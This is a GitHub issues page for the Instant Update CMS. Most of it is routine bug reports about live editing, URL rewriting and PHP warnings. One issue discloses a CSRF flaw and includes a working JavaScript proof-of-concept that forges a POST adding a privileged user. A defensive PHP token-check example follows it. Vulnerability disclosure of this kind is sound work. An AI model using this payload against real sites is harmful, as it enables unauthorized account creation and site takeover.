
cms's People

Contributors

avramovic, hazzeland, ijjk, lukamacun, sebastienfi, webinsane


cms's Issues

Jekyll

I've managed to get this to work with statically generated files from Jekyll, and it's awesome especially the inline editing stuff to boot.

You interested? I could do a pull request.

One thing that has been bothering me and that I've been trying to fix is all the index.php that keep appearing. Might have something to do with Jekyll being in a subdirectory. I'll figure it out :-) Thanks for making this, man!

Toggle Edit Bug

Ok some of my comments have been over misconfiguration on my part, but here is a real issue I may have found.

When I toggle edits, things are fine, edits are made. But when I go to stop editing, and toggle the editor off, nothing happens, and the debug console shows an error every time I click it:

Uncaught The editor instance "my-editable-id" is already attached to the provided element.

So what now? How to fix this problem I wonder?

URL Rewriting and Live Editing

I enabled mod rewrite. I log in, click on live edit.

It takes me to index.php, I can edit. Great.

I navigate to another page on the site. Since I have rewriting enabled, it takes me to /pagename.html, and the editing controls are gone.

If I type index.php/pagename.html I can edit.

My html and template files are in the root directory, is this correct?

How to make it so I can navigate the site and live edit at the same time again?

Thanks,
David

Live edit sidebar is nonexistent

For some reason, I'm not getting the sidebar with the edit controls. I followed all the documentation. Is there something I'm missing?

version

I have installed Instant Update 0.2.2 but installed.txt shows 0.2.1

and getting Fettle Error

on index.php/administration/users/edit/1 page

Absolute link fix when rewriting enabled

So if you have rewriting enabled, and your site has any absolute links like this:
a href="/services/location.html"
and you're at /services/location.html and you click the link, the link becomes
/services//services/location.html
How to fix this?

Can't log in after install

Tells me I have wrong username and password but I know it's right. Debug console shows lots of errors, one of which is a broken link to jQuery UI. There is a get template directory PHP line before an external link in the auth_login PHP file.

Demo is broken

After logging in and attempting inline edit, error appears in console

 Uncaught ReferenceError: IU_USER_PERMISSIONS is not defined
    at HTMLDocument.<anonymous> (?g=user-js:33)
    at l (jquery.js:2)
    at Object.fireWith [as resolveWith] (jquery.js:2)
    at Function.ready (jquery.js:2)
    at HTMLDocument.A (jquery.js:2)

jquery is not hard linked in admin

Hey crew, there's a broken link here: auth_login.php

<script type="text/javascript" src="base_url(); ?>http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>

should be:

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>

SVG's no worky worky!

As soon as I plug my template into IU, no SVG's will load. I have to convert all SVG's to PNG's and load those if I want to use Instant Update.... Wuts up with that yo? How do we fix fixy!

php version issue

Hi mates :)

With all PHP versions newer than PHP 5.4, iu-application/controllers/process.php at lines 165, 166 generates the following errors:

A PHP Error was encountered
Severity: 8192
Message: Non-static method BrowserOS::get_os() should not be called statically, assuming $this from incompatible context
Filename: controllers/process.php
Line Number: 166

A PHP Error was encountered
Severity: 8192
Message: Non-static method BrowserOS::get_browser_no_version() should not be called statically, assuming $this from incompatible context
Filename: controllers/process.php
Line Number: 167

Hope you can solve it ;)

Kind regards from Germany and huge thanks for the awesome IU-CMS.

Andy

Confirmation email from forums is not received - email settings?

Hello! I just found your project and think it's very good!

I tried to register to the forums at http://my.instant-update.com/, however the confirmation email is never received.

I'm using Gmail and wondering, could your email server be blacklisted? (I recently had a similar issue with another service)

  • My email address is correct
  • It's not in spam folder. (Or any other folder)
  • Other email is received normally
  • Waited, since yesterday
  • Tried resending confirmation email a couple of times
  • Similar issue with another unrelated service, which was solved by changing email address to another that forwards to my Gmail.

Maybe you should check that mails are sent normally? Mail configuration?

The gmail I was using is: e. . . . . . . . [email protected]

Problem with HTML comments once loaded through Instant Update

If you have an html comment, preceding a '<' with no space, it does not render the beginning '<' of the next element, so the html code is rendered as text. Example:

I have the following html:
<h1>Hello world</h1>
Everything is fine. Now I have a comment preceding it:
<!--comment--><h1>Hello world</h1>
the browser renders this:
h1>Hello world</h1>
Loaded as static html, the browser renders it fine, so there is clearly an issue with there not being white space after a comment that makes the first character after a comment disappear. How can we fix this, as the agency I work for uses dreamweaver templates that force comments right before elements for library items.

Some strange errors within input.php and process.php

First error:

A PHP Error was encountered

Severity: Warning

Message: Cannot modify header information - headers already sent by (output started at /var/www/web917/html/webcrew/iu-system/core/Exceptions.php:170)

Filename: core/Input.php

Line Number: 250

Next Error:

A PHP Error was encountered

Severity: 8192

Message: Non-static method BrowserOS::get_browser_no_version() should not be called statically, assuming $this from incompatible context

Filename: controllers/process.php

Line Number: 167

Last Error:

Severity: 8192
Message: Non-static method BrowserOS::get_os() should not be called statically, assuming $this from incompatible context

Filename: controllers/process.php

Line Number: 166

I hope you can fix it and find a solution for it. I'm using shared hosting with PHP 5.6

Kind regards, Andy

MySQL DB loader

I've noticed that some things like mysql_escape_string have been deprecated from 5.3 and therefore cause errors.

I've made a patch if you want to peer review it. I think that part of making sure data injection is good could be improved on which I may do later today. I'll submit now.

CSRF vulnerability in V0.3.3

I found that V0.3.3 has a CSRF vulnerability that can operate on a web site.
When I set $config['csrf_protection'] = TRUE; in iu-application/config/config.php

For example add a user:
Payload:

<script>history.pushState('', '', '/')</script>
<script>
  function submitRequest() {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "http:\/\/192.168.10.12\/index.php\/administration\/users\/save", true);
    xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=--------1590586755");
    xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8");
    xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.9");
    xhr.withCredentials = true;
    var body = "----------1590586755\r\n" +
      "Content-Disposition: form-data; name=\"name\"\r\n" +
      "\r\n" +
      "zhangsan2\r\n" +
      "----------1590586755\r\n" +
      "Content-Disposition: form-data; name=\"email\"\r\n" +
      "\r\n" +
      "[email protected]\r\n" +
      "----------1590586755\r\n" +
      "Content-Disposition: form-data; name=\"userrole_id\"\r\n" +
      "\r\n" +
      "\r\n" +
      "----------1590586755\r\n" +
      "Content-Disposition: form-data; name=\"password\"\r\n" +
      "\r\n" +
      "123456\r\n" +
      "----------1590586755\r\n" +
      "Content-Disposition: form-data; name=\"password2\"\r\n" +
      "\r\n" +
      "123456\r\n" +
      "----------1590586755\r\n" +
      "Content-Disposition: form-data; name=\"active\"\r\n" +
      "\r\n" +
      "true\r\n" +
      "----------1590586755\r\n" +
      "Content-Disposition: form-data; name=\"picture\"; filename=\"\"\r\n" +
      "Content-Type: application/octet-stream\r\n" +
      "\r\n" +
      "\r\n" +
      "----------1590586755\r\n" +
      "Content-Disposition: form-data; name=\"permissions[]\"\r\n" +
      "\r\n" +
      "2\r\n" +
      "----------1590586755\r\n" +
      "Content-Disposition: form-data; name=\"permissions[]\"\r\n" +
      "\r\n" +
      "4\r\n" +
      "----------1590586755\r\n" +
      "Content-Disposition: form-data; name=\"permissions[]\"\r\n" +
      "\r\n" +
      "5\r\n" +
      "----------1590586755\r\n" +
      "Content-Disposition: form-data; name=\"permissions[]\"\r\n" +
      "\r\n" +
      "6\r\n" +
      "----------1590586755\r\n" +
      "Content-Disposition: form-data; name=\"permissions[]\"\r\n" +
      "\r\n" +
      "7\r\n" +
      "----------1590586755\r\n" +
      "Content-Disposition: form-data; name=\"permissions[]\"\r\n" +
      "\r\n" +
      "8\r\n" +
      "----------1590586755\r\n" +
      "Content-Disposition: form-data; name=\"permissions[]\"\r\n" +
      "\r\n" +
      "10\r\n" +
      "----------1590586755\r\n" +
      "Content-Disposition: form-data; name=\"permissions[]\"\r\n" +
      "\r\n" +
      "11\r\n" +
      "----------1590586755\r\n" +
      "Content-Disposition: form-data; name=\"permissions[]\"\r\n" +
      "\r\n" +
      "12\r\n" +
      "----------1590586755--\r\n";
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++)
      aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
  }
</script>

result:
4

The CSRF vulnerability in V0.3.3 can do anything, such as upload a file, add a user, mkdir, change a password and so on.

Advice:
1. Determine the current user identity through a token or session.
2. Sensitive operations need a verification code; changing the password needs to verify the old password. (Unable to construct when constructing PoC. If you know your password, go directly to the background, why use CSRF)

I hope you can fix this vulnerability
author:[email protected]
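
A session-bound token check and an old-password check of the kind the advice above describes, as an added example that is not part of the original issue or of the Instant Update code base. The function names, the `csrf_token` field name and the sample values are assumptions, and it assumes PHP 7 or later for `random_bytes()`.

```php
<?php
// Added example: synchronizer-token check for state-changing requests.
// All function and field names here are hypothetical, not Instant Update's.

// Create (once per session) an unpredictable token to embed in every form.
function csrf_issue_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Decide whether a request may reach a handler such as a user-save action.
function csrf_request_allowed(string $method, array $post, array $session): bool
{
    // Safe methods must never change state, so they carry no token.
    if (in_array(strtoupper($method), ['GET', 'HEAD', 'OPTIONS'], true)) {
        return true;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // Reject missing tokens and array-valued fields (e.g. csrf_token[]=x).
    if (!is_string($expected) || !is_string($supplied) || $expected === '') {
        return false;
    }
    return hash_equals($expected, $supplied); // constant-time comparison
}

// A password change additionally requires the current password.
function password_change_allowed(string $oldPassword, string $storedHash): bool
{
    return password_verify($oldPassword, $storedHash);
}

// Constructed demonstration (arrays stand in for $_SESSION and $_POST).
$session = [];
$token   = csrf_issue_token($session);
$hash    = password_hash('constructed-old-password', PASSWORD_DEFAULT);

// A cross-site page cannot read the token, so its POST arrives without one.
$crossSite = ['name' => 'constructed-user', 'active' => 'true'];
$sameSite  = $crossSite + ['csrf_token' => $token];

var_dump(csrf_request_allowed('POST', $crossSite, $session));
var_dump(csrf_request_allowed('POST', $sameSite, $session));
var_dump(password_change_allowed('wrong-guess', $hash));
```

The check belongs in front of every state-changing route, before any handler logic runs, so that a request carrying only the session cookie is rejected.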
